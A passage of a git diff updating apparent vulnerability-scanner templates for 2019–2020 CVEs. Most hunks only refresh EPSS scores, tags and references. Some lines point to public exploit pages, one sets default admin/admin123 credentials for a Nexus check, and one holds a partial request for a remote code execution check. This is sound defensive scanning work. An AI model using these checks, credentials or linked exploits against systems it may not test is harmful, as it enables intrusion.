max-request: 2 diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index ec689977bb..c29b66a817 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7255 cwe-id: CWE-79 epss-score: 0.01544 - epss-percentile: 0.85509 + epss-percentile: 0.85658 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index d0182f2e2a..0021425df4 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 - epss-score: 0.97316 - epss-percentile: 0.99808 + epss-score: 0.97261 + epss-percentile: 0.9979 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 8a7e97309a..32311869b6 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7275 cwe-id: CWE-601 epss-score: 0.00483 - epss-percentile: 0.72859 + epss-percentile: 0.73162 cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 8ad6f5140f..e76fade388 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7315 cwe-id: CWE-22 - epss-score: 0.01275 - epss-percentile: 0.83989 + epss-score: 0.01493 + epss-percentile: 0.85376 cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 24fa81fe0e..e6ba99031a 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 - epss-score: 0.93374 - epss-percentile: 0.98715 + epss-score: 0.88397 + epss-percentile: 0.98325 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 5d45da230f..14f928bff4 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-7543 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44064 + epss-percentile: 0.44439 cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index c84527d2f4..261e49a1ed 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2019-7609 cwe-id: CWE-94 - epss-score: 0.97232 - epss-percentile: 0.9975 + epss-score: 0.96365 + epss-percentile: 0.99389 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 41a23a3590..ca4923ac2c 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.14515 - epss-percentile: 0.95041 + epss-percentile: 0.95114 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 4c13e7fb2c..69dd1b7d24 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-8390 cwe-id: CWE-79 - epss-score: 0.01669 - epss-percentile: 0.86063 + epss-score: 0.0161 + epss-percentile: 0.85984 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index d7e40df32a..1718d548be 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.9715 - epss-percentile: 0.99696 + epss-percentile: 0.99724 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 3229b25e29..c9436296ae 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8446 cwe-id: CWE-863 - epss-score: 0.11721 - epss-percentile: 0.94559 + epss-score: 0.15691 + epss-percentile: 0.95296 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index d4b9e40d57..d08f9d810d 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8449 cwe-id: CWE-306 - epss-score: 0.1884 - epss-percentile: 0.95564 + epss-score: 0.24444 + epss-percentile: 0.96064 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index dd8e8a2557..7a04d29d30 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-8451 cwe-id: CWE-918 epss-score: 0.97115 - epss-percentile: 0.9968 + epss-percentile: 0.99704 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index fb7cb9cab8..bf79197338 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8903 cwe-id: CWE-22 - epss-score: 0.0192 - epss-percentile: 0.87107 + epss-score: 0.01178 + epss-percentile: 0.83457 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index b39fa59d00..970f6dde34 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-8937 cwe-id: CWE-79 epss-score: 0.00921 - epss-percentile: 0.80927 + epss-percentile: 0.81139 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 0cfcdbe715..5b6eb4c25a 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-8982 cwe-id: CWE-918 epss-score: 0.02146 - epss-percentile: 0.87849 + epss-percentile: 0.88011 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 9ff4d664af..5e28cd2017 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -5,23 +5,24 @@ info: author: pikpikcu severity: high description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring. + remediation: | + Apply the latest security patch or upgrade to a newer version of ZZZCMS. reference: - https://www.exploit-db.com/exploits/46454/ - http://www.iwantacve.cn/index.php/archives/118/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9041 - remediation: | - Apply the latest security patch or upgrade to a newer version of ZZZCMS. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-9041 cwe-id: CWE-917 + epss-score: 0.01591 + epss-percentile: 0.85883 cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* - epss-score: 0.01127 metadata: max-request: 2 - product: zzzphp vendor: zzzcms + product: zzzphp tags: cve,cve2019,zzzcms,rce,edb http: @@ -30,7 +31,6 @@ http: POST /search/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /search/ HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index c1387c73e5..b2c3bcbe28 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9618 cwe-id: CWE-22 epss-score: 0.0643 - epss-percentile: 0.92768 + epss-percentile: 0.92861 cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index c308c0b525..7dbd55231d 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 - epss-score: 0.97513 - epss-percentile: 0.9997 + epss-score: 0.97147 + epss-percentile: 0.99722 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index f356b5b6a6..047b5788ae 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.02964 - epss-percentile: 0.89569 + epss-percentile: 0.89717 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 15f90d1a07..9640487296 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9733 epss-score: 0.90473 - epss-percentile: 0.98408 + epss-percentile: 0.98456 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index ed0c037ff6..e1310de626 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9915 cwe-id: CWE-601 - epss-score: 0.0016 - epss-percentile: 0.52017 + epss-score: 0.00123 + epss-percentile: 0.46236 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 1b317482b8..937445c95c 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-9922 cwe-id: CWE-22 - epss-score: 0.01413 - epss-percentile: 0.84822 + epss-score: 0.01088 + epss-percentile: 0.82709 cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index c34655bf4b..482ddb4a2d 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9955 cwe-id: CWE-79 - epss-score: 0.0561 - epss-percentile: 0.92301 + epss-score: 0.10511 + epss-percentile: 0.94359 cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index 41f3796737..d5508786c9 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9978 cwe-id: CWE-79 - epss-score: 0.97286 - epss-percentile: 0.99784 + epss-score: 0.97338 + epss-percentile: 0.99846 cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 363f686b70..b17a212768 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-0618 cwe-id: CWE-502 - epss-score: 0.97329 - epss-percentile: 0.99813 + epss-score: 0.97355 + epss-percentile: 0.99857 cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index e3adee1559..771c091957 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10148 cwe-id: CWE-287,CWE-288 - epss-score: 0.97347 - epss-percentile: 0.99832 + epss-score: 0.97324 + epss-percentile: 0.99837 cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index c1d059a349..44bafd5ca0 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -18,14 +18,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-10199 cwe-id: CWE-917 - epss-score: 0.97217 - epss-percentile: 0.99742 + epss-score: 0.97385 + epss-percentile: 0.99884 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sonatype product: nexus - tags: cve,cve2020,sonatype,nexus,rce,kev + tags: packetstorm,cve,cve2020,sonatype,nexus,rce,kev variables: username: admin password: admin123 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index de8d836ec7..773093ac0d 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -11,16 +11,24 @@ info: reference: - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 + - http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html + - http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html + - https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10220 cwe-id: CWE-89 + epss-score: 0.02204 + epss-percentile: 0.88184 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: rconfig + product: rconfig shodan-query: title:"rConfig" - tags: cve,cve2020,rconfig,sqli + tags: packetstorm,cve,cve2020,rconfig,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 9ac0547a4a..dbe12af09a 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10546 cwe-id: CWE-89 - epss-score: 0.4901 - epss-percentile: 0.97048 + epss-score: 0.52161 + epss-percentile: 0.97177 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index e067f01b4a..5108d49c5d 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10547 cwe-id: CWE-89 - epss-score: 0.4901 - epss-percentile: 0.97048 + epss-score: 0.52161 + epss-percentile: 0.97177 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 73a02ae839..cef218cbe0 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10548 cwe-id: CWE-89 - epss-score: 0.4901 - epss-percentile: 0.97048 + epss-score: 0.52161 + epss-percentile: 0.97177 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 7c652142eb..54a16b7bb5 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10549 cwe-id: CWE-89 - epss-score: 0.4901 - epss-percentile: 0.97048 + epss-score: 0.52161 + epss-percentile: 0.97177 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 7e6ffcad9d..51595bb5df 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-10770 cwe-id: CWE-918 - epss-score: 0.37441 - epss-percentile: 0.9668 + epss-score: 0.43882 + epss-percentile: 0.96949 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 2cb5f89a01..bf7cf9c610 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-10973 cwe-id: CWE-306 - epss-score: 0.03878 - epss-percentile: 0.90774 + epss-score: 0.04225 + epss-percentile: 0.91233 cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index bbff6106f8..f2cf77f37b 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-11034 cwe-id: CWE-601,CWE-185 - epss-score: 0.00396 - epss-percentile: 0.7014 + epss-score: 0.00381 + epss-percentile: 0.69883 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 9ec3a3d338..b9abf2145a 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2020-11110 cwe-id: CWE-79 - epss-score: 0.00131 - epss-percentile: 0.47313 + epss-score: 0.00179 + epss-percentile: 0.54805 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 6703839e83..1ea15d6a26 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - epss-score: 0.34975 - epss-percentile: 0.96566 + epss-score: 0.53167 + epss-percentile: 0.972 cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index f39509143e..b5d639fcbf 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11455 cwe-id: CWE-22 - epss-score: 0.5225 - epss-percentile: 0.97134 + epss-score: 0.71443 + epss-percentile: 0.97685 cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index bfe91be835..534932a1a4 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-11529 cwe-id: CWE-601 epss-score: 0.00349 - epss-percentile: 0.68242 + epss-percentile: 0.68588 cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 9ec4e15b97..d562c389e7 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11530 cwe-id: CWE-89 - epss-score: 0.65013 - epss-percentile: 0.9744 + epss-score: 0.63219 + epss-percentile: 0.97457 cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 7b97dcb712..7c55487a6d 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-11546 cwe-id: CWE-94 epss-score: 0.96429 - epss-percentile: 0.99376 + epss-percentile: 0.99413 cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 103e8ce607..58100e28e0 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-11547 cwe-id: CWE-306 epss-score: 0.0011 - epss-percentile: 0.43305 + epss-percentile: 0.43683 cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 9375ed7d91..de84640954 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11710 epss-score: 0.02084 - epss-percentile: 0.87657 + epss-percentile: 0.87812 cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 92190b5b1a..89a59dfdfc 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11738 cwe-id: CWE-22 - epss-score: 0.97273 - epss-percentile: 0.99776 + epss-score: 0.97244 + epss-percentile: 0.9978 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index f91c2de8a3..bdc2655ba7 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-11798 cwe-id: CWE-22 - epss-score: 0.75314 - epss-percentile: 0.97741 + epss-score: 0.81094 + epss-percentile: 0.97954 cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 1b56a867de..9d1d0d9f3c 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11853 - epss-score: 0.94797 - epss-percentile: 0.98954 + epss-score: 0.94984 + epss-percentile: 0.99043 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index ca58dfa05d..0416e78b4c 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11854 cwe-id: CWE-798 epss-score: 0.97414 - epss-percentile: 0.99886 + epss-percentile: 0.99902 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 67e005fbc9..c4b3af66a6 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.00396 - epss-percentile: 0.70156 + epss-percentile: 0.70482 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index d94be96c6c..2e80a34e5e 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -11,13 +11,14 @@ info: - https://twitter.com/wugeej/status/1400336603604668418 - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-78 - epss-score: 0.97524 - epss-percentile: 0.9998 + epss-score: 0.97203 + epss-percentile: 0.99753 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 9cb60ee8ce..a895f87774 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ 